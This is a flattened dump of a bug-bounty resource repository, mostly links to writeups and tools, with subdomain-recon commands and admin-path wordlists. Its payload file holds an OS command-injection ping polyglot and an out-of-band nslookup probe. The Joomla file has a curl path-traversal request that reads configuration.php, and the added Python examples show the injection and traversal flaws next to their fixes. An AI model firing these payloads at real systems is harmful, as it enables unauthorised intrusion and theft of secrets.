Repository layout (the file tree as listed on the page; only the files whose contents appear below are expanded):

- Top level: Nosql.md, ICMP Attacks.md, Email_Injection.md, web-shell.md, Auto-Recon.md, Laravel-RCE.md, LFI.md, Nmap.md, SAML.md, API_KEYS.md, Command-Injection.md, Nuclei_Templates.md, Scripting.md, JIRA-exploit-resources.md, Nginx.md, Source_code_leaker.md, WAF.md, Cache_poisioning.md, Subdomain_Takeover.md, Dorks.md, HTTP-method-testing.md, signUp-page.md, Hunting-on-aspx-application.md, Redirection-Response.md, Reflection-IN-Header.md, Interaction-File-URL.md, README.md, Secondary-Contexts.md, Authorization-Response.md, Crawlers_to_Find_juicy_stuff.md, identify what something is.md, CORS.md, Login_page.md, Privilege-Esclation.md, SSO.md, File_Generation.md, MY-Recon.md, Create edit remove ORG checklist.md, Sensitive-Data-in-Response.md, Setting-page-Checklist.md, phpinfo_page.md, Adding email checklist.md, CSP.md, Interesting_Params.md, Price_Manipulation.md, Burp.md, 403-Bypass.md, Dependency_confusion.md, Get-into-BugBounty.md, Broken_link_hijacking.md, Contact-support-page.md, Shopping-Application.md, XML-Body.md, email-verification.md, DNS-misconfiguration.md, Prototype-Polution.md, CSV-Injection.md, Java.md, Firebase-Databas-Takeover.md, Path-Traversal.md, reset-password.md, Graphql.md, 2FA.md, Subdomain Enumeration.md, Authentication_Bypass.md, Checklist.md, JWT.md, Cross-Site WebSocket Hijack.md, Fuzzing.md, Bug-Bounty-Tips.md, Hidden_Param_Finder.md, CSRF.md, AEM (Adobe Experience Manager) webapps.md, HTTP-Request-Smuggling.md, SSTI.md, RCE.md, API_Security.md, Practice Resources.md, Cookie-Vulnerabilities.md, Account_Takeover.md, IDOR.md, SQL-Injection.md, OAuth-Vulnerability.md, WriteUps.md, AWS-Pen-Testing.md, Wordlist.md, File-Upload.md, BugBounty-all-payload-Resource.md, JS-analysis.md, S3_Recon.md, Reconnaissance.md, tools.md, SSRF.md, XSS.md, CVES.md, DOS.md
- Wordlist-List/: Os command injection, Headers_List.md, Admin access Subdomains, Admin access Endpoint, WordPress wordlist, github-wordlist-link.md, Wordlist for Secret Find secret in js and github
- Technologies/: Jenkins.md, Symfony.md, Azure.md, Grafana.md
- Dorks/: TravisCI.md, SearchEngine.md, GitHub-Dorks.md
- Payloads/: os command injection
- CMS/: Joomla.md, WordPress.md
- Misc/: Homoglyph.md

## Wordlist-List/Os command injection

```text
/cgi-bin/parameter=payload
```

## Nosql.md

- http://ghostlulz.com/nosql-injection/

## ICMP Attacks.md

- https://resources.infosecinstitute.com/topic/icmp-attacks/

## Email_Injection.md

- https://pentestbook.six2dez.com/enumeration/web/email-attacks

## web-shell.md

- https://github.com/tennc/webshell/blob/master/README_EN.md

## Auto-Recon.md

- Rengine: https://github.com/yogeshojha/rengine#quick-installation

## Laravel-RCE.md

- https://infosecwriteups.com/rce-on-a-laravel-private-program-2fb16cfb9f5c

## LFI.md

- https://bierbaumer.net/security/php-lfi-with-nginx-assistance/

## Nmap.md

- Nmap NSE library: https://www.infosecmatter.com/nmap-nse-library/

## SAML.md

- https://www.cyberick.com/post/xxe-in-saml-sso-writeup-bug-bounty

## API_KEYS.md

- Firebase Cloud Messaging service takeover: https://abss.me/posts/fcm-takeover/

## Command-Injection.md

- Tool for OS command injection (commix): https://github.com/commixproject/commix
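As an added example (not code from this repository or from the commix project), the Python below shows why the polyglot ping payload listed further down this page under Payloads/os command injection breaks out of a command that is built as a shell string, and the argv-plus-validation form that stops it. `echo` stands in for `ping` so it runs offline and instantly, the injected host strings are constructed, and the hostname regex and function names are this example's own choices.

```python
"""Added example, not code from this repo or the commix project: shows why
the polyglot ping payload listed on this page (Payloads/os command
injection) breaks out of a command built as a shell string, and how
argv-style execution plus hostname validation prevents it.  `echo` stands
in for `ping` so the demo runs offline and instantly; the injected host
values are constructed sample input, not real targets."""
import re
import subprocess

# Polyglot probe copied from the page's Payloads/os command injection file.
# It is never executed here; it is only fed to the validator.
POLYGLOT = (
    r"|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' "
    r"|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1"
)

# Constructed harmless payload with the same shape (separator + extra command).
INJECTED_HOST = "127.0.0.1; echo INJECTED"

# RFC 1123-style hostname (also matches dotted IPv4): labels of 1-63 chars,
# letters/digits/hyphens, no leading or trailing hyphen, 253 chars max.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[a-z0-9-]{1,63}(?<!-)(?:\.(?!-)[a-z0-9-]{1,63}(?<!-))*$",
    re.IGNORECASE,
)


def is_valid_hostname(host: str) -> bool:
    """Allow-list check: only characters a hostname can contain pass."""
    return HOSTNAME_RE.match(host) is not None


def ping_vulnerable(host: str) -> str:
    """Interpolates the host into a shell string (shell=True), so every
    metacharacter in it (; | || ` #) is interpreted by /bin/sh."""
    command = f"echo pinging {host}"
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


def ping_argv(host: str) -> str:
    """Passes the host as one argv element with no shell involved: the
    metacharacters reach the program as literal bytes in a single argument."""
    return subprocess.run(["echo", "pinging", host], capture_output=True, text=True).stdout


def ping_hardened(host: str) -> str:
    """Defence in depth: reject anything that is not a hostname, then use argv."""
    if not is_valid_hostname(host):
        raise ValueError(f"rejected host: {host!r}")
    return ping_argv(host)


if __name__ == "__main__":
    print("shell string :", repr(ping_vulnerable(INJECTED_HOST)))  # second command ran
    print("argv         :", repr(ping_argv(INJECTED_HOST)))        # one literal argument
    print("validator    :", is_valid_hostname(POLYGLOT), is_valid_hostname("example.com"))
```

The polyglot's value on a real target is the ~20 second delay from `ping -c 21` / `ping -n 21`, which is what makes it usable blind; the argv form above neutralises it even before the validator runs, because nothing parses `|`, `` ` `` or `#` once there is no shell in the path.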
## Wordlist-List/Headers_List.md

- https://github.com/fullhunt/log4j-scan/blob/master/headers-large.txt

## Nuclei_Templates.md

- Nuclei templates: https://github.com/NitinYadav00/My-Nuclei-Templates

## Scripting.md

- One-liner scripts (pure-bash LinkFinder): https://github.com/dwisiswant0/awesome-oneliner-bugbounty#pure-bash-linkfinder

## Technologies/Jenkins.md

- Notes about attacking Jenkins servers: https://github.com/gquere/pwn_jenkins

## Wordlist-List/Admin access Subdomains

```text
dev
stag
admin
internal
stag-dev
stag-admin
internal-dev
```

## JIRA-exploit-resources.md

- JIRA CVE exploits: https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c

## Nginx.md

- Nginxpwner tool: https://www.kitploit.com/2021/05/nginxpwner-tool-to-look-for-common.html?m=1
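Added example, not the repository's own script: the Python below merges per-tool output files like those the MY-Recon.md commands later on this page produce (subfinder, assetfinder, amass) into one normalised, in-scope, de-duplicated set, then expands the Admin access Subdomains wordlist above into candidate hostnames to resolve or brute-force next. The three tool-output strings, the target `example.com` and the function names are constructed for this example.

```python
"""Added example, not the repository's own code: post-processes the
per-tool subdomain lists that the MY-Recon.md commands on this page
produce (subfinder, assetfinder, amass) into one normalised, in-scope,
de-duplicated set, and expands the Admin access Subdomains wordlist into
candidate hostnames to resolve or brute-force next.  The three tool
outputs below are constructed sample data, not real scan results."""
import re
from typing import Iterable, List, Optional

# Constructed sample output; real files come from the MY-Recon.md commands.
SUBFINDER_OUT = "www.example.com\napi.example.com\nDEV.example.com\n"
ASSETFINDER_OUT = "example.com\n*.example.com\napi.example.com\ncdn.example.net\n"
AMASS_OUT = "https://stag.example.com/\nmail.example.com.\nstag.example.com:443\n"

# The page's Wordlist-List/Admin access Subdomains entries.
ADMIN_PREFIXES = ["dev", "stag", "admin", "internal", "stag-dev", "stag-admin", "internal-dev"]

_SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*://")


def normalise(entry: str) -> Optional[str]:
    """Reduce one line of tool output to a bare lowercase hostname.
    Handles the variants the tools emit: mixed case, wildcard "*.host",
    full URLs, "host:port", trailing dots and blank or comment lines."""
    host = entry.strip().lower()
    if not host or host.startswith("#"):
        return None
    host = _SCHEME.sub("", host)
    host = host.split("/", 1)[0].split(":", 1)[0]
    host = host.lstrip("*.").rstrip(".")
    return host or None


def in_scope(host: str, target: str) -> bool:
    """True for the apex itself or anything ending in '.<target>', so
    'example.net' or 'notexample.com' do not sneak into the result."""
    return host == target or host.endswith("." + target)


def merge_subdomains(target: str, *tool_outputs: str) -> List[str]:
    """Union of all tool outputs, normalised and filtered to the target scope."""
    found = set()
    for text in tool_outputs:
        for line in text.splitlines():
            host = normalise(line)
            if host and in_scope(host, target):
                found.add(host)
    return sorted(found)


def candidate_hosts(target: str, prefixes: Iterable[str], known: Iterable[str]) -> List[str]:
    """Prepend each wordlist prefix to the apex and to every discovered
    subdomain (e.g. dev.api.example.com), dropping names already known."""
    known_set = set(known)
    bases = [target] + [h for h in known_set if h != target]
    candidates = {f"{prefix}.{base}" for prefix in prefixes for base in bases}
    return sorted(candidates - known_set)


if __name__ == "__main__":
    merged = merge_subdomains("example.com", SUBFINDER_OUT, ASSETFINDER_OUT, AMASS_OUT)
    print("\n".join(merged))
    print("--- candidates to resolve next ---")
    print("\n".join(candidate_hosts("example.com", ADMIN_PREFIXES, merged)))
```

Read the three files produced by the recon commands with `open(...).read()` and pass them to `merge_subdomains`; the scope filter matters because assetfinder without `--subs-only` and amass both report related domains that may be outside the program's scope.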
## Source_code_leaker.md

- https://www.kitploit.com/2021/12/sourceleakhacker-multi-threads-web.html?m=1

## WAF.md

- Everything about web application firewalls (Awesome-WAF): https://github.com/0xInfection/Awesome-WAF

## Cache_poisioning.md

- https://youst.in/posts/cache-poisoning-at-scale/
- https://bxmbn.medium.com/

## Wordlist-List/Admin access Endpoint

```text
/dev/register/
/stag/register/
/dev/login/
/register/
/internal/
/stag/
```

## Subdomain_Takeover.md

- NtHiM, super fast subdomain takeover detection: https://github.com/TheBinitGhimire/NtHiM

## Dorks.md

- Dorks collections list: https://github.com/cipher387/Dorks-collections-list
- GitHub dorks helper: https://vsec7.github.io/

## HTTP-method-testing.md

- HTTP method testing by OWASP: https://wiki.owasp.org/index.php/Test_HTTP_Methods_(OTG-CONFIG-006)

## Technologies/Symfony.md

- EOS loots information from a Symfony target in debug mode: https://github.com/Synacktiv/eos

## signUp-page.md

- https://docs.google.com/presentation/d/17Qexwb7Way19ou-9X3wgKpFx0bXLLLNVIiNK8pNaolI/mobilepresent?slide=id.ga9d77201d5_0_156

## Hunting-on-aspx-application.md

- Hunting on ASPX applications for P1s (unauthenticated SOAP, RCE, info disclosure): https://0u.ma/m/3

## Redirection-Response.md

- https://docs.google.com/presentation/d/1Ee0w3-7fBpxD5hM17fxb-SA1r1WpHKpB8R0lNgSGXyk/mobilepresent?slide=id.gaf8ff68377_0_328

## Reflection-IN-Header.md

- https://docs.google.com/presentation/d/1K8SKqggVwuzarTiKSf6VUBsGX9zpZqjGQkr2XxXpLWo/mobilepresent?slide=id.gb4f8bdb222_0_0

## Wordlist-List/WordPress wordlist

```text
wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml
wp-admin/setup-config.php?step=1
```

## Interaction-File-URL.md

- https://docs.google.com/presentation/d/1sfitPjqr7b6RBKeJa-qgjcJ3lp3oCdiM0JBNznAGh7A/mobilepresent?slide=id.gb88a89362b_0_78

## README.md

Bug Bounty Resources: bug bounty writeups and exploit resources. **Use it only for ethical purposes.**

## Secondary-Contexts.md

- https://docs.google.com/presentation/d/1jqnpPe0A7L_cVuPe1V0XeW6LOHvMYg5PBqHd96SScJ8/mobilepresent?slide=id.gb78d501c4d_0_312

## Technologies/Azure.md

- XMGoat, an open source pentesting tool for Azure: https://www.xmcyber.com/xmgoat-an-open-source-pentesting-tool-for-azure/

## Authorization-Response.md

- https://docs.google.com/presentation/d/1ek6DzXKBQd6xUiVNGRT33pMACs8M13CSoYCkgepDKZk/mobilepresent?slide=id.gb2a807bdfd_0_0

## Crawlers_to_Find_juicy_stuff.md

- SourceWolf, a fast response crawler for finding juicy stuff in source code: https://github.com/ksharinarayanan/SourceWolf

## identify what something is.md

- pyWhat, identify anything (emails, IP addresses and more): https://github.com/bee-san/pywhat

## CORS.md

- If HttpOnly You Could Still CSRF… Of CORS you can!: https://medium.com/@_graphx/if-httponly-you-could-still-csrf-of-cors-you-can-5d7ee2c7443

## Login_page.md

- Login page checklist: https://docs.google.com/presentation/d/1lGMRCYJo9d66A3rIVNbTk3thn76uc9Gyp8Gpu9mZHQ8/mobilepresent?slide=id.gac49ca7b44_0_158

## Privilege-Esclation.md

- https://docs.google.com/presentation/d/1IOw1CVKw15ZW0fUUot0j5eUIepE_NGBybWf92Y9AtMg/mobilepresent?slide=id.gd438d330c0_0_318

## SSO.md

- SSO checklist: https://docs.google.com/presentation/d/1bxBL0HyL8pbDUsa00abfbfEoawmx-XsVIkUjF_V2-_I/mobilepresent?slide=id.gaa585d4e81_0_156

## File_Generation.md

- File generation: https://docs.google.com/presentation/d/1m4DbtZ3HjU43xeXsEdOJIGe-pkwowH87fsxBS1QK7_4/mobilepresent?slide=id.gb3c7f3a5f1_0_156

## MY-Recon.md

Subdomain enumeration: run each tool separately and keep the three output files for merging.

```sh
subfinder -d domain.com -o file1.txt
assetfinder --subs-only domain.com > file2.txt   # assetfinder has no -o flag; it prints to stdout
amass enum -d domain.com | tee -a file3.txt
```

## Dorks/TravisCI.md

- secretz, automation that fetches repos, builds and logs for any given organization from TravisCI: https://github.com/lc/secretz
## Wordlist-List/github-wordlist-link.md

- Collection of wordlists: https://github.com/heilla/SecurityTesting/blob/master/wordlists/Collection%20of%20wordlists.md

## Create edit remove ORG checklist.md

- Checklist: https://docs.google.com/presentation/d/1E5zjGcnqSe7asDreGPgBS2T-bAJ5siuE0QKvJnX91Cw/mobilepresent?slide=id.ge2f51227b3_0_158

## Sensitive-Data-in-Response.md

- Sensitive data in response: https://docs.google.com/presentation/d/18Megn0BLxRd3_gzzhiPN1nlZ1TB8hVckAUJcRhRZqSE/mobilepresent?slide=id.gb16bd8c8c4_0_477

## Setting-page-Checklist.md

- Settings page checklist: https://docs.google.com/presentation/d/11Aa5PkGswQdZo3sLYbB8PAFfgGLocDpRujaGf5v6g70/mobilepresent?slide=id.gae8ab10c68_0_156

## phpinfo_page.md

- From phpinfo page to many P1 bugs and RCE (Symfony): https://u-itachi.medium.com/from-phpinfo-page-to-many-p1-bugs-and-rce-symfony-bce432605662

## Adding email checklist.md

- Adding email checklist: https://docs.google.com/presentation/d/18EROY7aLfy6omx3-KTjUnAfOuh3UP5UiAnSc__uuRV4/mobilepresent?slide=id.ge49d443037_0_310

## CSP.md

- Exploiting CSP in WebKit to break authentication and authorization: https://threatnix.io/blog/exploiting-csp-in-webkit-to-break-authentication-authorization/

## Dorks/SearchEngine.md

- Search engine dorks: https://docs.google.com/presentation/d/1dBXWUFKXa6gWQNCifN939Wf1ZNTIELlRZ4FhcaHvSOE/mobilepresent?slide=id.gce482a8cc4_0_310

## Interesting_Params.md

- Top 25 vulnerability parameters, usable in automation tools or manual recon: https://github.com/lutfumertceylan/top25-parameter

## Price_Manipulation.md

- Price manipulation bypass using integer overflow: https://marxchryz.medium.com/price-manipulation-bypass-using-integer-overflow-method-36ff23ebe91d

## Burp.md

- Burp Suite for pentesters: Software Vulnerability Scanner and Retire.js: https://www.hackingarticles.in/burp-suite-for-pentester-software-vulnerability-scanner/

## Payloads/os command injection

The first line is a polyglot meant to work whether the injected value lands unquoted, inside single quotes or inside double quotes, on Windows (`ping -n`) or Unix (`ping -c`), and signals success as a delay of roughly 20 seconds; the second is an out-of-band probe that signals through a DNS lookup to a Burp Collaborator host.

```text
|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
|nslookup -q=cname my.burpcollaborator.net.&
```

## 403-Bypass.md

- 403 Forbidden bypass: https://dewangpanchal98.medium.com/403-forbidden-bypass-fc8b5df109b7
- bypass-403: https://github.com/iamj0ker/bypass-403

## Dependency_confusion.md

- https://hetroublemakr.medium.com/how-i-approached-dependency-confusion-272b46f66907
- https://dhiyaneshgeek.github.io/web/security/2021/09/04/dependency-confusion/

## Get-into-BugBounty.md

- Vickie Li writeup: https://medium.com/swlh/mastering-the-skills-of-bug-bounty-2201eb6a9f4
- https://githubhelp.com/jandersoncampelo/InfosecBookmarks

## Broken_link_hijacking.md

- Broken link hijacking, 404 on Google Play Store, xxx$ bounty: https://proviesec.medium.com/broken-link-hijacking-404-google-play-store-xxx-bounty-96e79a8dfd71

## Contact-support-page.md

- Target contact page tips: https://docs.google.com/presentation/d/1wqx9fnr9v451FHdU33XeXBIg3b_pfhF9X0ttkydrGlk/mobilepresent?slide=id.gb07b8690e7_0_156

## Shopping-Application.md

- Vulnerabilities in shopping applications: https://docs.google.com/presentation/d/1yMLYZbjERTeojwjve7Yh6Pojvljnl0UVAKTY9i-ZaSE/mobilepresent?slide=id.gb240823d22_0_155

## XML-Body.md

- XML body: https://docs.google.com/presentation/d/1bCODG8WGPvsCNOBFXRNh3RrQTfFeoVrP5FxrptGm7AA/mobilepresent?slide=id.gb53efb3cea_0_0
- https://gosecure.github.io/xxe-workshop/#2

## email-verification.md

- https://infosecwriteups.com/email-verification-bypass-a-strange-case-f38291866126
- Email bounce: https://infosecwriteups.com/an-unexpected-bounty-email-bounce-issues-b9f24a35eb68

## DNS-misconfiguration.md

- DNS misconfiguration details: https://resources.infosecinstitute.com/topic/dns-hacking/
- Misconfigured zone transfer: https://www.cybrary.it/blog/0p3n/find-dns-zone-transfer-misconfiguration/

## Prototype-Polution.md

- Tool (plution): https://github.com/raverrr/plution
- ppfuzz, a fast client-side prototype pollution scanner written in Rust: https://github.com/dwisiswant0/ppfuzz

## CSV-Injection.md

Bug in "export to spreadsheet" functionality in web applications.

- Details: https://www.contextis.com/en/blog/comma-separated-vulnerabilities
- HackerOne report: https://hackerone.com/reports/928280

## Java.md

- Java deserialization scanner (jexboss): https://github.com/joaomatosf/jexboss
- Common vulnerabilities in Java and how to fix them: https://blog.shiftleft.io/common-vulnerabilities-in-java-and-how-to-fix-them-fe69e859b262

## Firebase-Databas-Takeover.md

- Firebase database takeover: https://danangtriatmaja.medium.com/firebase-database-takover-b7929bbb62e1
- https://medium.com/@fs0c131y/how-i-found-the-database-of-the-donald-daters-app-af88b06e39ad

## Path-Traversal.md

- ASP.NET path traversal: https://alaa0x2.medium.com/asp-net-core-path-traversal-e2bed792d171
- Bypassing LFI (local file inclusion): https://medium.com/@abhishake21/bypassing-lfi-local-file-inclusion-ebf4274e7027

## reset-password.md

- https://docs.google.com/presentation/d/1QzBl3k3n2q44ULyfZgr_gPZexj8nF5vD8JrS5AUJRbs/mobilepresent?slide=id.gac68916404_0_19
- 10 password reset flaws: https://anugrahsr.github.io/posts/10-Password-reset-flaws/

## Graphql.md

- Exploiting GraphQL: https://blog.assetnote.io/2021/08/29/exploiting-graphql/
- GraphQL abuse: https://labs.detectify.com/2018/03/14/graphql-abuse/
- https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application

## 2FA.md

- 2FA bypass techniques: https://www.mindmeister.com/1736437018?t=SEeZOmvt01
- Two-factor authentication security testing and possible bypasses: https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35

## Subdomain Enumeration.md

- DNS subdomain scanner (dnscan): https://github.com/rbsec/dnscan
- Subdomain enumeration guide: https://sidxparab.gitbook.io/subdomain-enumeration-guide/introduction/whats-the-need
- https://github.com/screetsec/Sudomy

## Authentication_Bypass.md

- Authentication bypass, easy P1 in 10 minutes: https://infosecwriteups.com/authentication-bypass-easy-p1-in-10-minutes-54d5a2093e54
- Authentication bypass using root array: https://infosecwriteups.com/authentication-bypass-using-root-array-4a179242b9f7

## Dorks/GitHub-Dorks.md

- GitHub dorks: https://docs.google.com/presentation/d/1lqBriLkclVwCi4q_VhJUXa-GYehLsMp054PzN4qrTn8/mobilepresent?slide=id.g9e14b666d8_0_147
- truffleHog, automation for finding high-entropy strings in git repos: https://github.com/trufflesecurity/truffleHog

## Checklist.md

- Pentesting web checklist: https://pentestbook.six2dez.com/others/web-checklist
- https://github.com/coreb1t/awesome-pentest-cheat-sheets
- https://github.com/riramar/Web-Attack-Cheat-Sheet
- https://cheatsheet.haax.fr/web-pentest/resources-discovery/

## CMS/Joomla.md

Joomla! component com_jssupportticket, arbitrary file download:

- https://www.exploitalert.com/view-details.html?id=33803

```sh
# The downloadbyname task joins the attacker-controlled "name" onto the attachment
# directory without normalising it, so "../" walks up to the site's configuration.php.
curl -X GET -i "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php"
```
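Added example, not the Joomla component's code: a minimal "download by name" resolver modelled on the endpoint the curl request above hits, in the traversal-prone form and in a hardened form that confines the resolved path to the attachments directory, including through symlinks. The directory layout, file names and contents are constructed in a temp directory; the page's payload climbs three levels from the Joomla web root, this fixture needs only one.

```python
"""Added example, not the Joomla component's code: a minimal 'download by
name' resolver in the shape of the com_jssupportticket endpoint, in the
traversal-prone form the curl request exploits and in a hardened form that
pins the resolved path inside the attachments directory (including through
symlinks).  Directory layout, file names and contents are constructed in a
temp directory."""
import os
import tempfile


def resolve_naive(attachments_dir: str, name: str) -> str:
    """Vulnerable: joins the user-supplied name straight onto the base
    directory, so '../configuration.php' walks out of it."""
    return os.path.join(attachments_dir, name)


def resolve_safe(attachments_dir: str, name: str) -> str:
    """Hardened: accept only a bare file name, then verify the canonical
    path still lives under the canonical base directory."""
    if not name or os.path.basename(name) != name or name in (".", ".."):
        raise ValueError(f"not a bare file name: {name!r}")
    base = os.path.realpath(attachments_dir)
    target = os.path.realpath(os.path.join(base, name))
    # realpath() follows symlinks, so a planted link pointing outside the
    # directory is caught here even though its name passed the first check.
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes attachments directory: {name!r}")
    return target


def download(attachments_dir: str, name: str, resolver) -> str:
    """What the endpoint would stream back to the client."""
    with open(resolver(attachments_dir, name), encoding="utf-8") as fh:
        return fh.read()


def build_fixture() -> str:
    """Constructed layout: <root>/configuration.php holds the secret and
    <root>/attachments/ticket-1.txt is the only legitimate download.
    A symlink attachments/notes.txt -> ../configuration.php stands in for a
    planted link.  Returns the attachments directory."""
    root = tempfile.mkdtemp(prefix="jssupportticket-")
    attachments = os.path.join(root, "attachments")
    os.mkdir(attachments)
    with open(os.path.join(root, "configuration.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php class JConfig { public $password = 'hunter2'; }")
    with open(os.path.join(attachments, "ticket-1.txt"), "w", encoding="utf-8") as fh:
        fh.write("attachment body")
    try:
        os.symlink(os.path.join("..", "configuration.php"), os.path.join(attachments, "notes.txt"))
    except (OSError, NotImplementedError):
        pass  # symlinks unavailable (e.g. unprivileged Windows); the other checks still apply
    return attachments


def has_symlink_fixture(attachments_dir: str) -> bool:
    """True when build_fixture() managed to plant the symlink."""
    return os.path.islink(os.path.join(attachments_dir, "notes.txt"))


if __name__ == "__main__":
    att = build_fixture()
    print(download(att, "ticket-1.txt", resolve_naive))
    print(download(att, "../configuration.php", resolve_naive))  # secret leaks
    for candidate in ("../configuration.php", "notes.txt"):
        try:
            resolve_safe(att, candidate)
        except ValueError as exc:
            print("blocked:", exc)
```

The basename check alone is not enough: it rejects `../configuration.php` but passes `notes.txt`, which is why the canonical-path comparison after `realpath()` is kept as the second gate. Web frameworks URL-decode `%2e%2e%2f` before the handler sees it, so the check runs on the decoded value, which is the right place.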
## JWT.md

- JWT automated vulnerability scanner (HackerOne report): https://hackerone.com/reports/993582
- Critical vulnerability in JSON Web Encryption: https://auth0.com/blog/critical-vulnerability-in-json-web-encryption/

## Cross-Site WebSocket Hijack.md

- Cross-site WebSocket hijack (cswsh): https://github.com/DeepakPawar95/cswsh
- https://sunilyedla.medium.com/websocket-hijacking-to-steal-session-id-of-victim-users-bca84243830
- Peeping through a WebSocket: https://cirius.medium.com/peeping-through-a-web-socket-936ed55a2c31

## Fuzzing.md

- IntruderPayloads, a collection of Burp Suite Intruder payloads, BurpBounty payloads, fuzz lists, malicious file uploads and web pentesting methodologies and checklists: https://github.com/1N3/IntruderPayloads
- A complete guide to directory brute force, admin panels and API endpoints: https://github.com/emadshanab/Acomplete-guide-to-dir-brute-force-admin-panel-and-API-endpoints

## Bug-Bounty-Tips.md

- Bug bounty tips by @punishell: https://github.com/punishell/bbtips
- Vulnerability approach slides by Aditya Shende: https://github.com/kongsec/Vulnerabilities-Approach-Slides/blob/main/Book_of_tips_by_aditya_shende.pdf
- How I hacked BBC mail servers: https://cyberguy0xd1.medium.com/how-i-hacked-bbc-mail-servers-e61bb6faed2d
- Bug Bounty Tips #5: https://www.infosecmatter.com/bug-bounty-tips-5-aug-17/

## Hidden_Param_Finder.md

- x8, hidden parameter discovery suite: https://github.com/Sh1Yo/x8
- json2paths finds hidden endpoints, especially on APIs: it fetches JSON responses from Burp Suite history and builds a URL-path wordlist from the JSON keys: https://github.com/s0md3v/dump/tree/master/json2paths
- Params, discovering hidden treasure in web apps: https://medium.com/geekculture/params-discovering-hidden-treasure-in-webapps-b4a78509290f

## CSRF.md

- CSRF in JSON requests: https://hacklido.com/blog/449-json-csrf-csrf-that-none-talks-about
- CSRF combined with JSON type confusion: https://blog.azuki.vip/csrf/
- How I was able to delete anyone's account in an online car rental company: https://infosecwriteups.com/bugbounty-how-i-was-able-to-delete-anyones-account-in-an-online-car-rental-company-8a4022cc611
- https://infosecwriteups.com/story-of-a-weird-csrf-bug-bde1129c106e

## AEM (Adobe Experience Manager) webapps.md

- AEM application vulnerabilities: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=9
- How I found my first AEM-related bug: https://infosecwriteups.com/how-i-found-my-first-aem-related-bug-5ea901aad3f4
- Quick wins with Adobe Experience Manager: https://www.pentestpartners.com/security-blog/quick-wins-with-adobe-experience-manager/

## HTTP-Request-Smuggling.md

- https://docs.google.com/presentation/d/1DV-VYkoEsjFsePPCmzjeYjMxSbJ9PUH5EIN2ealhr5I/mobilepresent?slide=id.gc72dc9a11a_0_310
- Practical HTTP header smuggling: sneaking past reverse proxies to attack AWS and beyond: https://www.intruder.io/research/practical-http-header-smuggling
- How to set up Docker for Varnish HTTP/2 request smuggling: https://labs.detectify.com/2021/08/26/how-to-set-up-docker-for-varnish-http-2-request-smuggling/

## SSTI.md

- PortSwigger SSTI: https://portswigger.net/web-security/server-side-template-injection
- https://verneet.com/fuzzing-77-till-p1/
- https://gauravnarwani.com/injecting-6200-to-1200/
- SSTI wordlist for fuzzing: https://github.com/err0rr/SSTI/blob/master/Wordlist
- Limited FreeMarker SSTI to arbitrary LiQL query and managing Lithium CMS: https://blog.mert.ninja/freemarker-ssti-on-lithium-cms/

## RCE.md

- Pre-auth RCE in Moodle part II, session hijack in Moodle's Shibboleth: https://haxolot.com/posts/2022/moodle_pre_auth_shibboleth_rce_part2/
- An unauthenticated RCE vulnerability in MovableType, CVE-2021-20837: https://medium.com/@TutorialBoy24/an-unauthenticated-rce-vulnerability-in-movabletype-cve-2021-20837-70664b159dd7
- https://machevalia.blog/remote-code-execution-in-tgz-file-upload/
- https://medium.com/manomano-tech/the-tale-of-a-click-leading-to-rce-8f68fe93545d

## API_Security.md

A variety of resources to help you out on the API security path.
2 | https://dsopas.github.io/MindAPI/references/ 3 | 4 | ## Two account takeover bugs worth $4300 5 | https://blog.usamav.dev/two-account-takeover-bugs-worth-4300-dollar-bounty 6 | 7 | ## API tips 8 | https://gowsundar.gitbook.io/book-of-bugbounty-tips/api 9 | 10 | ## One Endpoint, Two Account Takeovers 11 | https://securityflow.io/one-endpoint-two-account-takeovers/ 12 | 13 | ## How I Bought a £240.00 Annual Subscription for Bargain £0.01 14 | https://infosecwriteups.com/how-i-bought-a-240-00-annual-subscription-for-bargain-0-01-7ccbc6776545 15 | 16 | 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /Practice Resources.md: -------------------------------------------------------------------------------- 1 | ## Awesome Vulnerable Applications 2 | https://github.com/vavkamil/awesome-vulnerable-apps 3 | 4 | ## awesome-android-security 5 | https://github.com/saeidshirazi/awesome-android-security 6 | 7 | ## Awesome-Hacking 8 | https://github.com/Hack-with-Github/Awesome-Hacking 9 | 10 | 11 | ## awesome api security 12 | https://github.com/arainho/awesome-api-security 13 | 14 | ## 15 | https://github.com/optiv/InsecureShop 16 | 17 | ## 18 | https://github.com/Bypass007/Learn-security-from-0 19 | 20 | ## 21 | https://github.com/kaiiyer/awesome-vulnerable 22 | 23 | ## 24 | https://github.com/saeidshirazi/awesome-android-security 25 | 26 | 27 | -------------------------------------------------------------------------------- /Cookie-Vulnerabilities.md: -------------------------------------------------------------------------------- 1 | ## CookieMonster: a tool for breaking stateless authentication 2 | https://ian.sh/cookiemonster 3 | 4 | ## Cookie Based Authentication vulnerabilities 5 | https://github.com/imran-parray/Mind-Maps/blob/master/Cookie%20Based%20Authentication%20Vulnerabilities%20-%20Harsh%20Bothra/Cookie_Based_Authentication_Vulnerabilities.png 6 | 7 | ## Overflow Trilogy ( HTTP Response Splitting with Header 
